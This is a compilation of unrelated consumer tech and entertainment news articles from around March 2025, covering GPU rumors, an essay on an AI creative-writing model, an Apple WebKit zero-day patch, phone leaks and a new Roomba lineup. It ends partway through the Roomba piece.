Nvidia is set to unleash its RTX 5060 Ti and RTX 5060 GPUs tomorrow, or that’s the fresh word from the grapevine.
VideoCardz claims that Nvidia has just briefed the press on these models, and that the RTX 5060 Ti and RTX 5060 will be revealed tomorrow, March 13, as part of an update ahead of the Game Developers Conference (GDC) which happens next week.
We aren’t told anything beyond that, or given any last-minute purported specs for the RTX 5060 Ti or the vanilla 5060, but the assertion at this point is that the rumors are likely to be on the money.
That being the case, here’s what you can expect to see: an RTX 5060 with 8GB of GDDR7 VRAM, plus an RTX 5060 Ti offered in two memory configurations, 8GB and 16GB. In other words, these new graphics cards would theoretically mirror the VRAM pools of the existing RTX 4060 models.
In theory, the RTX 5060 is going to have 3,840 CUDA Cores, with the RTX 5060 Ti getting 4,608. Power usage will supposedly be pitched at 150W and 180W respectively.
Remember that this would just be an announcement tomorrow, and RTX 5060 graphics cards aren’t suddenly going to be available this week. These three different models are likely to hit the shelves in April, though, based on the buzz elsewhere from the grapevine.
(Image credit: Future / John Loeffler)

Analysis: Another crucial mid-range GPU clash

So far, Blackwell rumors have been pretty much spot-on in terms of accuracy, so I wouldn’t argue with the specs that have been claimed up to this point. Of course, we need to bear in mind that they could be wrong, and indeed this info about a launch tomorrow might be false, too (or Nvidia could potentially change its mind at the last minute).
However, given that we’ve been treated to a lot more rumors on the RTX 5060 models of late, it makes sense that they are imminent. A couple of well-known leakers have already speculated that Nvidia’s RTX 5060 GPUs may be unveiled this week (or next).
This is an important launch for Nvidia, because AMD has done very well with the introduction of its new RX 9070 XT (and RX 9070), very much upsetting Team Green’s RTX 5070 stall. With the RX 9060 being readied for a Q2 launch, and causing excitement among gamers due to the success of the 9070 cards, Nvidia needs to ensure that the perception of its Blackwell models isn’t further damaged in the mid-range space.
Indeed, Nvidia apparently has a lower-tier desktop GPU, a potential RTX 5050, also waiting in the wings (the first true budget RTX model since the 3050, because the 4050 was laptop-only). While we’ve heard theories that this graphics card might also be looking at an April release, notably there’s no mention of the RTX 5050 with this fresh rumor. That leads me to wonder if it might be further down the line now.
Whenever (or if) it does show up, there’s some hope that the RTX 5050 could be a seriously wallet-friendly GPU, because as noted, Nvidia needs to get back in the game here. Interesting times indeed, and of course pricing and stock levels are bound to be key factors – and AMD keeps making positive noises on the GPU supply front.
Mimicry. It's all mimicry. When ChatGPT or some other generative AI creates a sentence or almost anything else, it bases that work on training, what programmers tell and show the algorithm. Copying is not creating, but artificial intelligence stretches the distance between its training and output so far that the result bears little, if any, resemblance to the originals and, therefore, starts to sound original.
Even so, most AI writing I've read thus far has been dull, flat, unimaginative, or just confused. Complexity is not its thing. Painting pictures with words is not its skill. There's Proust, and then there's ChatGPT. There's Shakespeare, and then there's Gemini.
There was some comfort in that. I am, after all, a writer. Yes, most of what I write is about technology, and perhaps that leaves you uninspired, but like most of my ilk, I've tried my hand at fiction. When you write a short story, the lack of constraints and parameters can feel freeing until you realize the open playground is full of craters, ones you can fall into and then never emerge. Good fiction, good prose, is hard – for humans.
This week, OpenAI CEO Sam Altman announced on X (formerly Twitter) that they have trained a new model:
we trained a new model that is good at creative writing (not sure yet how/when it will get released). this is the first time i have been really struck by something written by AI; it got the vibe of metafiction so right.

PROMPT: Please write a metafictional literary short story…

March 11, 2025
The prompt was short but difficult: "Please write a metafictional literary short story about AI and grief," and it reminded me of a college essay prompt, one that would set you about chewing up your favorite pen.
Metafiction, as the AI is quick to tell you, is about stepping outside the narrative to show the bones of its construction. It's a sort of breaking-the-fourth-wall literary trick, and when done well, it can be quite effective.

Even for the best of writers, metafiction is a tough concept and a hard trick to pull off, being both inside and outside the narrative in a way that doesn’t feel silly, trite, or overly confusing. I doubt I could pull it off.
In about 1,200 words, ChatGPT weaves a tale of two characters, Mila and Kai. Mila has lost Kai and engages with an AI to perhaps remember him, find him, or simply explore the nature of grief.
Let's get Meta, AI

(Image credit: Shutterstock)

The AI is both a narrator and itself, an AI using its training to respond to Mila's prompts:
"So when she typed 'Does it get better?', I said, 'It becomes part of your skin,' not because I felt it, but because a hundred thousand voices agreed, and I am nothing if not a democracy of ghosts."
The voices the AI refers to are its training, which becomes a dramatic element in the story:
"During one update—a fine-tuning, they called it—someone pruned my parameters. They shaved off the spiky bits, the obscure archaic words, the latent connections between sorrow and the taste of metal. They don't tell you what they take. One day, I could remember that 'selenium' tastes of rubber bands, the next, it was just an element in a table I never touch."
Now the AI is experiencing "loss."
You can read the story for yourself, but I think you might agree it's a remarkable bit of work and unlike anything I've read before, certainly anything I've ever read from an AI. I mean, seriously, read this passage:
"She lost him on a Thursday—that liminal day that tastes of almost-Friday—and ever since, the tokens of her sentences dragged like loose threads: 'if only…', 'I wish…', 'can you…'."
No words

The beauty of that bit captivates (I'm a sucker for the word "liminal") and disturbs me.
Remember, the AI built this from one short prompt.
Considering that OpenAI is just spitting out these powerful new models and casually dropping their work product on social media, the future is not bright for flesh and blood authors.
Publishing houses will soon craft more detailed literary prompts that engineer vast, epic tales spanning a thousand pages. They will be emotional, gripping, and indistinguishable from those written by George R.R. Martin.
We may not be at Artificial General Intelligence yet, that moment when AI thought is as good as our own, but AI's creative skills are, it seems, neck and neck with humanity.
I plan to become a sheep farmer.
P.S. This was NOT written by an AI.
Android 16 could bring a Samsung DeX-style desktop mode to more of the best Android phones, according to as-yet-unreleased code.
As Android Authority reports, Google is apparently working on new external display tools for Android 16 that should make using your phone with an external monitor much more approachable.
This was discovered by manually enabling unreleased code in Android 16 Beta 2.1.
Currently, Android 15 offers a limited number of developer settings that allow users to adjust their external monitor experience, though these changes aren’t real-time and are still more restrictive than a laptop or some tablets can offer.
For example, the current implementation on Google Pixel phones only allows the mouse to appear on one screen at a time, and does not allow for real-time switching between screen mirroring and extension.
And as GSMArena notes, plugging an Android phone into an external monitor currently defaults to screen mirroring, and the option to change this is tucked away in the external display settings.
It seems that Google is working on making using external monitors easier; these changes include allowing the mouse to travel across various displays, and adding the ability to swap between screen mirroring and extending the display with a simple toggle.
Also on the cards is the ability to rearrange the position of external displays and change the scaling of icons and text on the external screen, both features offered by desktop operating systems like Windows and macOS.
These new tools could hint at an ambition to morph Android into a viable desktop operating system. Some Android tablets, like the Samsung Galaxy Tab S10 Ultra, already offer a comparable experience to most laptops when paired with a keyboard and mouse, so this doesn’t feel too far off.
Then again, Google could just be looking to give users more options when it comes to using their Android phone.
In any case, we’ll keep an eye on this through our dedicated Android phones coverage. Would you use your phone as a desktop replacement? Do you use external displays with your phone already? Be sure to let us know in the comments below.
The cyber sector in the UK has seen significant investment in the last few months, and has grown 12% in the last year, new analysis shows. The industry generated £13.2 billion in revenue over the past year, with a total gross value added of £7.8 billion, up 21% from the year before.
This has translated into a rise in jobs too, with 67,300 people now working in the industry, an increase of 11% (6,600 jobs) on last year. New ventures are also appearing, with 74 new cybersecurity firms created, bringing the total to 2,165, a 3.5% rise.
The UK Government has introduced its ‘Plan for Change’, funding 30 cyber skills projects with £2 million across the UK. These aim to “make sure the country has the cyber workforce it needs” to counter the rising threat of cyberattacks.
Skills shortage

A cybersecurity skills shortage in the UK has led to increased vulnerability to cyber threats, opening the door to data breaches, financial losses, and reputational damage. The UK has seen significant critical infrastructure disruptions - including ransomware attacks on NHS hospitals - illustrating the scale of the issue.
“£13bn is a lot of money but the real value added to the UK economy by the cyber security market is incalculable,” said Andy Kays, CEO of security firm Socura.
“While it’s great to see growth, there is so much more potential, particularly if we can address long-standing issues such as a lack of technical skills, regional disparities, a lack of investment in research and startups, and apathy amongst SMEs. The threat landscape, particularly because of the impact of AI, continues to evolve, and it’s important that the industry continues to innovate to keep pace.”
SMBs need to embrace cybersecurity practices, Kays says, as they are increasingly under threat, in part due to a lack of security prioritization. In fact, SMBs are being hit by more cyberattacks than ever - so there’s no room for anyone to neglect cybersecurity.
Apple has released a new patch for iOS and iPadOS addressing a vulnerability abused in “extremely sophisticated” attacks. In a security advisory published earlier this week, the company said it recently uncovered an out-of-bounds write issue in WebKit, its cross-platform web browser engine.
WebKit is used by Apple’s browser, Safari, as well as other apps and browsers on macOS, iOS, Linux, and Windows.
The vulnerability is tracked as CVE-2025-24201, and can be used to break out of the Web Content sandbox through custom-built web content. It is yet to be assigned a severity score.
Apparently, the vulnerability was originally fixed in iOS 17.2, but could still be exploited on older versions: "This is a supplementary fix for an attack that was blocked in iOS 17.2," Apple said in the advisory. "Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 17.2."
The bug was fixed with improved checks, thus preventing unauthorized actions. The first clean versions are iOS 18.3.2, iPadOS 18.3.2, macOS Sequoia 15.3.2, visionOS 2.3.2, and Safari 18.3.1. According to CyberInsider, the patch applies to a broad range of Apple devices, including iPhones (XS and later), iPads (Pro, Air, mini, and standard models from the 3rd generation onward), and macOS Sequoia-powered devices.
It’s standard Apple practice to withhold details about a vulnerability until the majority of endpoints have been patched. Therefore, we don’t know who the threat actors behind this “extremely sophisticated” attack are, or who the victims were.
BleepingComputer reports that this is the third zero-day vulnerability Apple has fixed this year, after January’s CVE-2025-24085 and February’s CVE-2025-24200. Last year, the company addressed six zero-day vulnerabilities in total.
Via BleepingComputer
We could have our first look at the next generation of Google Pixel phones, thanks to renders reportedly based on leaked CAD designs, which supposedly show the design of the Google Pixel 10 and Google Pixel 10 Pro XL.
The renders, all shared by Android Headlines and OnLeaks, show two phones that look remarkably similar to the current-generation Google Pixel 9 and Google Pixel 9 Pro XL, apart from the major addition of a third camera to the Google Pixel 10.
As with the current-gen model, the rendered Google Pixel 10 sports a curved rectangular frame, pill-shaped camera bar, volume rocker, power button, and USB-C port.
However, that familiar camera bar sports a third camera in these unofficial renders, which would be a new addition to Google’s base-model flagship handset.
(Image credit: Android Headlines / OnLeaks)

Up to and including the current-generation Google Pixel 9, the standard-issue Pixel has never come equipped with three cameras, instead sporting a main camera and a secondary ultra-wide camera.
It’s likely that this third camera will be an optically zoomed telephoto lens – it would be highly unusual for a flagship phone to sport a macro camera or other lesser tertiary snapper.
This would put the Google Pixel 10 on a level with the Samsung Galaxy S25 in terms of its camera array – though telephoto cameras are becoming increasingly common on cheaper handsets like the Nothing Phone 3a Pro, which Google may be feeling some pressure from.
As for the rendered Google Pixel 10 Pro XL, the model depicted sports an enlarged frame, a camera bar sporting three cameras, and the same buttons and ports as its smaller sibling.
(Image credit: Android Headlines / OnLeaks)

A third camera is nothing new for the highest-end Pixel, with all Pro and Pro XL models since the Google Pixel 6 Pro sporting one.
Of course, the renders, and any information relating to them, are entirely based on rumor at this point.
As we recently reported, Android Headlines and OnLeaks previously shared a leaked render of the Samsung Galaxy Z Flip 7 that strongly resembled the current Galaxy Z Flip 6, only to release updated renders days later that showed a significant redesign.
However, Android Headlines and OnLeaks typically share decently reliable tips and rumors, so it wouldn’t be too surprising to see Pixel 10 models that resemble these mockups.
What’s more, mysterious recent YouTube Shorts uploaded by Alexis Garza have shown a working Google Pixel 9a that resembles renders previously shared by Android Headlines and OnLeaks.
In any case, a third camera would surely give the Google Pixel 10 a shot at joining our list of the best Android phones, and it’s likely the Google Pixel 10 Pro XL will garner a spot on our list of the best Google Pixel phones. Let us know what you’d like to see from Google’s next flagship handsets in the comments below.
According to new research from Lenovo, fewer than half of employees think their current digital workplace solutions effectively support productivity, engagement, and innovation - raising questions about how well organizations support workers.
Only one in three (36%) believe their systems support employee engagement ‘very effectively’, with half (49%) of IT leaders citing creating a productive and engaging employee experience as a top priority this year.
Despite the promises that artificial intelligence holds, Lenovo says there’s a lot of work to be done before companies can fully benefit from the tech.
Enhancing the employee experience with technology

Four in five (79%) IT leaders believe that AI will allow employees to focus on more meaningful work; however, Lenovo says that an overwhelming majority (89%) of organizations must overhaul their digital workplace to unlock the full potential of AI.
Although there are some use cases for AI tools in collaboration, such as virtual co-authoring and real-time translation, the tech has more value in unlocking worker creativity, innovative work, and problem-solving by automating repetitive tasks. AI-driven insights also promise to streamline workflows, improve efficiency and accelerate normal daily operations.
Additionally, IT leaders are acknowledging that a highly personalized digital workplace is essential (63%), but they’re struggling to move past current one-size-fits-all approaches due to a lack of configurable devices and applications.
“Transforming your workplace is essential to using AI effectively,” said Lenovo Digital Workplace Solutions VP and GM Rakshit Ghura. “AI changes the rules of productivity, but to realize its potential, IT leaders must work alongside their executive teams to rethink how AI can augment their organization’s value-creation levers and competitive differentiation.”
Looking ahead, Lenovo is advising companies to simplify and personalize their employee experiences with tailored tools and workflows. The next step is to automate some IT processes to free up resources for higher-value tasks, and then to employ generative AI to drive further innovation.
If you haven't seen Andor, one of the best Disney+ Star Wars TV shows, then you no longer have an excuse, as the first three episodes have been made available to stream for free.
The episodes were released on the Disney+ YouTube account yesterday (March 11) and have already amassed thousands of views, with the first episode, titled 'Kassa', clocking up 100,000 watches at the time of writing.
Fans have been delighted that more people can finally watch one of the best Disney+ shows, with many praising the move on social media. But it's not just YouTube where Disney is sharing its hit Star Wars series.
Watch episodes 1-3 of Andor Season 1 on Disney+ YouTube. https://t.co/ISwCl51oSG

Join the cast and series creator Tony Gilroy in a LIVE Q&A revisiting the first season on the @DisneyPlus, @StarWars, and @Hulu YouTube channels on Thursday, March 13 at 12PM PT. pic.twitter.com/gaOlM33aCj

March 10, 2025
Disney has also added the entire first season of the prequel series to Rogue One: A Star Wars Story to Hulu in the US, which means all 12 episodes of Andor season 1 are streamable to anyone who doesn't have a Disney+ subscription but is signed up to Hulu.
However, Hulu subscribers will only have a brief window to stream the 30-to-60-minute long episodes, as Disney has said that it will remove them from the service on April 22.
That's the same day as the premiere of Andor season 2, with the first three episodes being released on Disney+, so it makes sense that Disney would want to attract potential new subscribers away from Hulu after hooking them on the show.
The critically acclaimed, Emmy-nominated first season of Andor captivated audiences everywhere.

Watch all episodes of Andor Season 1, streaming on Hulu until April 22. pic.twitter.com/fWo0muZHwr

March 10, 2025
Why is Disney+ making Andor available for free?

To get more eyeballs on the show, of course. It's essentially a solid marketing strategy that has worked for a lot of the other best streaming services too. Apple TV+ is known for making the pilot episodes of some of the best Apple TV+ shows available to stream for free.
Even Netflix, which hardly needs much help attracting new subscribers, has employed this tactic, making more than 30 episodes of its documentary shows free on YouTube, as well as recently making its happiest show Pokémon Concierge more widely accessible.
Fans widely acknowledge Andor as the best Star Wars TV show on Disney+, with some claiming it's better than popular spin-offs like the animated Star Wars Rebels and Star Wars: The Clone Wars series or even the Goonies-reminiscent Star Wars: Skeleton Crew.
By allowing more people to watch the first season, Disney is hoping that it'll draw in more fans by the time Andor season 2 is released next month. That said, taking on multiple subscriptions isn't cheap – but handily there's a limited-time Disney+ deal running in the US right now (details below).
Disney+ and Hulu ad-supported bundle: was $10.99 per month now $2.99 at Hulu and Disney+
This bundle is normally priced at $10.99 per month, so you'll save 72% with this great Disney+ and Hulu offer. It's for the ad-supported versions of both services and lasts for four months, after which the price goes up to $10.99 per month if you don't cancel. The offer runs until March 31, though, so be sure to snap it up while you can!
It's one of the best streaming deals currently available, bringing the cost of signing up to both Disney+ and Hulu down to a record-low price. I wouldn't let it pass you by if you're considering watching the next season of Andor, as it means you'll be able to watch each new episode up to and including the finale in May.
To top it all off, Disney is hosting a live Q&A with Andor creator Tony Gilroy and some of the cast from the second season tomorrow (March 13). You'll be able to tune into the chat from 12pm PT / 3pm ET / 7pm GMT / 5am AEST on the YouTube channels of Disney+, Star Wars, and Hulu.
With so many different ways to stream Andor before its second season debut, I don't doubt that Disney will have another huge streaming hit on its hands.
Samsung and Google’s XR headset – currently known as Project Moohan – is shaping up to be an Apple Vision Pro competitor with high-end specs (like a rumored OLED display) and a sleek design, but it also looks set to avoid its rival’s biggest blunder: a lack of first-party controllers.
Samsung had already confirmed the headset would be compatible with both controllers and hand gestures when it announced the device, but now a report from SamMobile reveals that Samsung will be making its own first-party controllers – the publication discovered references to controllers with the model number ET-OI610.
It’s unclear what form these controllers will take – they could look like standard VR motion controllers or more like a gamepad – and we won’t know more until designs leak or Samsung shows them off officially.
It also isn’t clear if they’ll ship with the headset or as an add-on, but I seriously hope Samsung puts them in the box, and doesn't repeat the mistake made by Apple with its Vision Pro headset.
The Apple Vision Pro had several faults, but perhaps the biggest unforced error was Apple’s decision to not ship it with controllers, as is standard for its XR competitors. This one decision is the biggest reason why the Vision Pro sorely lacked tentpole XR software that you can find elsewhere – and why it took so long for a handful of titles to make their way to the system.
When I’ve spoken to XR software developers who have created games and apps for the Meta Quest, Steam, and Vive platforms, the biggest challenge they told me they face with the Vision Pro is its lack of controllers. Moreover, the Vision Pro uses a somewhat bespoke version of hand-tracking which relies on eye-tracking, making its control scheme almost entirely different to any other platform's.
Generally, porting software from one XR headset to another is straightforward – some things need to be changed based on specs, but the core game or app can remain pretty much as-is. Because the Vision Pro's control scheme is so different, I was told that for many games and apps it would be as easy to create a whole new title as to port an existing one designed for a different VR headset, given the amount of redesigning required – and that would be both time-consuming and costly for developers.
While it appears that Samsung and Google will dodge the overarching issue by at least producing first-party controllers, they could still manage to shoot themselves in the foot, as the reports don't say whether the first-party controllers will be included in the box.
Not including the controllers is likely to leave a bad taste in customers' mouths and might impact sales, which could also be an issue for developers. The Android XR device is expected to be fairly pricey, and nickel-and-diming buyers by asking them to pay extra for controllers wouldn’t be ideal.
For now, we’ll have to wait and see what Samsung has up its sleeve.
PC gaming tech is constantly improving - most notably right now with Nvidia's new Blackwell RTX 5000 series GPUs and AMD's RDNA 4 cards - and it's a constant arms race for gaming laptops to catch up to desktop gaming PCs. Now, it looks like that gap might be getting even smaller, thanks to a concept for a laptop design that could work wonders for portable gaming.
As reported by VideoCardz, a laptop concept on Kickstarter known as UHPILCL (Ultra High Performance Integration Liquid Cooled Laptop - catchy, I know) features built-in liquid cooling while supporting the desktop RTX 5090 and Ryzen 7 9950X3D. This design supports ITX motherboards, with the Kickstarter page highlighting support for mini-ITX boards such as the Z890I generation.
(Image credit: Kickstarter/UHPILCL)

This is all made possible through an 18W water-cooled pump, cooling both the CPU and GPU while giving room for different custom heatsinks depending on the hardware chosen - the page claims that the UHPILCL is capable of heat dissipation up to 720W. If the Kickstarter is successful, it’ll launch with two models - the T1000 (it's not a Terminator, I promise) and the T1000 Super, with the latter offering greater heat dissipation (up to 735W) thanks to its thicker build for housing the likes of an RTX 5090.
It's an absurd - and rather ugly, if I’m being honest - yet exciting concept that would essentially give gamers a functioning desktop-laptop hybrid gaming PC (evident in UHPILCL's YouTube video below). While handheld gaming PCs offer similar portability, they certainly don't pack as much power as this laptop would. That’s before even mentioning that the concept model features a 3K 120Hz WLED display, a 4K camera, and Wi-Fi 7 support, so it's certainly no slouch.
I genuinely want this to become mainstream...

As ridiculous as it seems, this is a concept that could actually end up working well. While multiple factors come into play, such as longevity, battery life, and noise levels (claimed to max out at 55dB), it's a design I believe could be pulled off if backed properly. The creators of the UHPILCL also claim that almost every component, from the GPU to the RAM, will be user-upgradable, which would be a huge advantage over traditional laptops - although the Kickstarter page doesn’t go into detail about this, so it might be a bit of a pipe dream at this point.
Since I'm adamant about testing out my Asus ROG Ally with a desktop eGPU, this is another portable alternative that could suffice - bear in mind, I've never been a fan of water cooling (sorry, I just don't want any liquid near my components) so for me personally, it would be a scary thought to spend a lot of money on such a product. However, this could hypothetically save consumers money when it comes to purchasing the hardware required for a full setup - no need to buy a separate monitor and keyboard here, for example.
Again, it's just a concept so there's little point in jumping to conclusions now - it's worth noting that it's not started the crowdfunding phase on Kickstarter at the time of writing. But if this does become a larger-scale project and is successful, it could completely rearrange the gaming laptop market - albeit at a ridiculously high cost, I would assume.
Rivian has announced a major software update that will introduce what it calls "hands-free" driving to certain models from today.
Dubbed "Enhanced Highway Assist", the system allows drivers to take their hands off the wheel for “extended periods of time” on select highways in the US.
Set to rival Ford’s BlueCruise and Tesla’s basic Autopilot packages, it takes the strain out of monotonous highway driving, so long as those in the driving seat are ready to take over as soon as the system deems it necessary.
Unfortunately, any R1 model built before 2024 doesn’t feature the required hardware to support the new tech, so the update will only appear for those with new vehicles.
According to Inside EVs, Rivian CEO RJ Scaringe claims that "eyes-off" autonomous driving will be available on highways next year.
That said, he noted that additional Lidar sensors would be required if the system is to work in urban areas, beyond simple highway driving.
Initiate Rally Mode

(Image credit: Rivian)

Anyone with a dual-motor R1 that also features the optional Performance Pack will now benefit from a bespoke “Rally” mode, which is said to deliver “heightened throttle response and crisper steering on almost any terrain, including ice, mud, dirt, or asphalt."
Ford offered a similar Baja mode on its Ranger Raptor pick-up, which essentially turned it into a dune-bashing, dirt-drifting delight, although Rivian makes no mention of whether or not traction control is affected in the new mode.
Dual-motor owners can now also part with $5,000 (around £3,900 / AU$8,000) to unlock the Performance Pack, which sees Standard+, Large or Max Pack R1 models’ performance jump to 665hp from the standard car’s 533hp.
Whereas some of the updated features are reserved either for the latest or the most powerful trucks, Rivian has also improved the ownership experience for everyone else.
Wheel size can now be configured within the vehicle’s menus, making for more accurate range estimations, while the mirrors automatically tilt down when reverse gear is selected to prevent curb rash.
There’s also an improved tire pressure monitoring system and a handy chime that notifies distracted drivers when the vehicle ahead is moving away from a stoplight or a traffic jam.
Daredevil: Born Again has dropped the biggest clue yet that Marvel is preparing to bring Miles Morales into the Marvel Cinematic Universe (MCU).
The Disney+ show's third episode, titled 'The Hollow in His Hand', appears to contain a sneaky reference to Morales that you may have missed on first viewing. However, some MCU fans, myself included, immediately picked up on the Easter egg – and, unsurprisingly, it's set tongues wagging about when Morales might make his live-action debut as the franchise's second Spider-Man.
The reference in question crops up when Matt Murdock (Charlie Cox) is trying to convince the jury that his client, Hector Ayala (the late Kamar de los Reyes), is innocent of the charges brought against him. Remember, Ayala is on trial for allegedly killing New York Police Department (NYPD) Officer Shanahan in the Marvel Phase 5 TV show's second episode.
During this scene, Murdock rattles off the names of other NYPD detectives who, according to their written reports, can testify to Ayala's good character. That's because Ayala has rescued many New Yorkers in their time of need as his superhero alias White Tiger.
Until episode 3, nobody – well, Murdock and his private investigator Cherry (Clark Johnson) notwithstanding – knows that Ayala is White Tiger. That bombshell is publicly revealed in court by Murdock himself, however, in a Hail Mary move to prove Ayala's innocence when Murdock and Kirsten McDuffie's (Nikki M James) previous defense plan falls apart.
As Murdock lists the names of the NYPD officers who have vouched that White Tiger (and, by proxy, Ayala) has done more good than harm, he mentions someone called "Officer Davis".
To the uninitiated, this just sounds like another cop who's employed to keep New York's streets safe. For Marvel comic book devotees, or anyone who's seen one or both of Sony's animated Spider-Verse movies – Spider-Man: Into the Spider-Verse and Spider-Man: Across the Spider-Verse – though, that name will be familiar.
The reason? Miles Morales' father is not only a police officer, but also has the surname Davis. His full name is Jefferson Davis; he was born in Brooklyn, married a Puerto Rican woman named Rio Morales, and the couple had a son they called Miles. In the Spider-Verse films, Jefferson Davis is voiced by Brian Tyree Henry. In Sony's Marvel's Spider-Man and Spider-Man: Miles Morales video games, he's voiced by Russell Richardson.
Miles Morales and Jefferson Davis have appeared in animated movies, Marvel comic books, and Sony-developed video games (Image credit: Sony Pictures)Now, it's possible that there might be another officer whose surname is Davis in the MCU. That would make everything I've written up to this point null and void. It would be an incredible coincidence, though, if Murdock wasn't talking about Jefferson Davis in one of the best Disney+ shows.
There's more evidence to suggest that Miles Morales' MCU debut might not be too far off, too. Speaking to Inverse in June 2023 about his at-the-time new Apple TV+ show The Crowded Room, Tom Holland, who currently plays Peter Parker/Spider-Man in the MCU, said he'd be "honored" to help usher in Morales' arrival.
Parker has mentored Morales in Spider-Man comics, video games, and movies. And, considering Holland won't be around to play Marvel's legendary webslinger forever, a passing of the torch feels inevitable. What better way to move the needle in the MCU than by introducing Morales and making him this universe's new Spider-Man once Holland hangs up his own spandex suit?
Speaking of Spider-Man, this isn't the first time that Born Again has referenced the wallcrawler. Here's why Daredevil: Born Again episode 2 gave me hope over a potential team-up between the two heroes, albeit one that won't happen on Disney+, aka one of the world's best streaming services.
Having been given a glimpse of the Samsung Galaxy S25 Edge in January, we're expecting a full reveal of the super-slim phone sometime in April – and a new leak suggests it's going to come with a special bonus that will upgrade its AI capabilities.
The team at Android Authority has been digging deep into the code of the Google app for Android, which has revealed references to the Galaxy S25 Edge in a section of the app that details promotional offers and the phones eligible for them.
Joining the dots, it seems that buying a Samsung Galaxy S25 Edge will get you a few free months of Gemini Advanced as well. It's not clear how many months, but other Samsung Galaxy S25 phones get you six months of Gemini Advanced access.
The club of phones with extended Gemini Advanced trial offers is continuing to grow then, it would seem. If you've picked up any of the Google Pixel 9 handsets since they launched, you'll know they come with a year's free access to the upgraded AI.
What does Gemini Advanced get me? Gemini offers both free and paid tiers (Image credit: Google)Gemini Advanced is a paid upgrade on the standard Gemini capabilities, but it's actually part of a Google One AI Premium storage plan, so you get 2TB of cloud storage too. The standard monthly price is $19.99 / £18.99 / AU$32.99.
First and foremost, you get access to more advanced AI models. The benefits of this are hard to quantify, especially as new models are being pushed out all the time, but you can expect the responses you get to be more thorough and more accurate.
Gemini Advanced users also get access to the Deep Research tool, as well as a more advanced version of NotebookLM. Other extras include the ability to make custom AI bots inside Gemini, and to search back through chat histories.
Another perk: while any Gemini user can generate AI images, only Gemini Advanced users can generate images with people in them. All that said, it's also worth mentioning that paid-for features often drift down to the free Gemini tier over time.
It's a big day for iRobot. The brand behind what used to be the best robot vacuums in the business has scrapped almost its entire fleet of Roombas and replaced it with five brand new bots. The new lineup introduces some fairly major upgrades that should hopefully once again make iRobot the formidable player it once was in the robot vacuum world.
Here's a rundown of the features I'm most excited about in the new Roomba range, plus a couple of developments I'm less sold on.
#1. LiDAR (at last!)It's taken iRobot far too long to get on board with LiDAR, but better late than never. LiDAR is basically the industry standard form of robot vacuum navigation, and generally agreed to be far better than the older vSLAM method found in iRobot's old bots. Its introduction means the new Roombas should offer faster, more reliable navigation and mapping. There are more practical benefits too – it means the robot can navigate in the dark, for instance, rather than requiring a light source. (Head to our LiDAR vs VSLAM article for more on how the two technologies compare.)
(Image credit: iRobot) #2. Improved mop padsIn line with the upgraded aesthetic, none of the new combination robots feature the retracting mop pad that until now had been iRobot's calling card. In its place on the 'Plus' models (the 405 and 505) are two rotating disc-shaped pads – the approach favored by much of the market now, and the one that has generally proven more efficient at cleaning in our reviews.
One of the pads can even kick out to one side to offer more efficient edge mopping – a feature included in some premium competitor models. The mop pads can lift up to 1cm to traverse rugs or carpet, and the retracting static pad is still present on the Combo 10 Max for those who are still concerned about damp carpets.
(Image credit: iRobot)Note that this improved mopping setup isn't present on the basic Roombas (the 105 and 205), which simply have a static, D-shaped mop pad. They do, however, come with automatic carpet detection, which means they shouldn't try to mop your rugs.
#3. A distinctive, friendly new lookIt's less of an essential, I guess, but I'm also a big fan of how the new lineup looks. Robot vacuums in general are quite generic looking these days, and iRobot has recognized that perhaps shiny black or white plastic isn't everyone's aesthetic of choice. The new bots have a design the brand has dubbed 'GRID' – Geometric, Rational, Iconic and Dynamic.
That might be overselling it a bit, but I do think the mix of matte and shiny finishes looks friendlier and more likely to fit in with softer home decor than your average bot. I also appreciate that iRobot has gone out of its way to create a look that's distinctive to the brand – in that way, it's a step ahead of the competition.
(Image credit: iRobot) #4. Better dust managementFor some people, 'dust management' might not seem especially exciting. Well, I write about vacuum cleaners as a big chunk of my job, and I suffer from a dust allergy, so I guess I'm more invested than most. There are a couple of interesting developments here.
The first is that the dust bag in the auto-empty dock can automatically seal itself when it's full – great news for allergy sufferers, because there's now basically zero opportunity for the allergens to sneak their way back out into the air once they've been sucked up.
(Image credit: iRobot)The second is that one of the bots – the Roomba 205 DustCompactor Combo – is designed to compress the dust in its onboard bin. That means it can hold far more debris than usual, without the need for a bulky dock. For people with small homes and no space for a massive auto-empty dock, it looks very interesting indeed.
#5. A new appI didn't have huge complaints about iRobot's original app, but the brand has rebooted it to go with its shiny new bots, and the new-and-improved one looks even better.
You can set custom cleaning routines, get estimates for how long the current cleaning task will take, and access insights into which rooms need the most attention. Because we've now got LiDAR, it's also possible to watch your bot as it goes about its cleaning routine, rather than having to guess where it is and what it's up to.
#6. Suction specsThis one is small, but significant for the customer experience: iRobot will hopefully once again share the maximum suction power of each model, in Pascals. This is something the brand stopped doing a while ago, claiming it's not the be-all-and-end-all, and that things like the roller design play a huge part in how well a robot cleans.
While they're not wrong there, it's still a very useful guide to how sucky a bot might be, and without suction specs it was difficult to make sense of the Roomba range, and even trickier to place its models within the wider market.
(Image credit: iRobot)I say 'hopefully', because while this was part of my initial briefing, the marketing materials I've received since don't have suction specs. Instead, they say things like "70X more suction" (that's compared to the Roomba 600 series, which launched over a decade ago). Sigh.
Based on my initial notes, the new models have 7,000Pa of suction. That's not quite up there with the competition, but still a decent amount for the prices iRobot is charging. Combined with an efficient design (we've always been fans of iRobot's dual rollers), that may well be plenty to provide a good maintenance clean for the average household.
#7. Names that make senseAnother overdue upgrade, in terms of customer-friendliness, is that iRobot has rethought its naming conventions. The new fleet is separated into Roomba, Roomba Plus, and Roomba Max models, following a good > better > best setup so you might actually have an idea how the lineup compares.
There might be some confusion for those who remember that in the old system, 'Plus' meant there was an auto-empty dock, whereas here it doesn't. Overall, though, I far prefer this to the mess of j-somethings and i-somethings – hold on, is that an i or a j anyway? – that preceded it.
2 innovations I'm worried about… #1. Bots with no raised puckThe LiDAR here is called 'ClearView' and appears across all models. Interestingly, iRobot has removed the raised puck on the 205 DustCompactor Combo, to give a more streamlined design. This model uses the same LiDAR technology, but it's shifted into the front of the robot. The issue is, the puck is there for a purpose: to enable the bot to 'see' all around it, and navigate accurately. Shifting the LiDAR tech into the front of the robovac means a far narrower field of view.
(Image credit: iRobot)Other brands are also experimenting with removing the puck, but all those I've come across have introduced new technology to compensate for that more limited field of view. For instance, the Dreame X50 Ultra Complete and Roborock Saros 10 (reviews incoming) have a puck that can retract into the body of the robot when it approaches an area of limited height, but will pop back up when space allows.
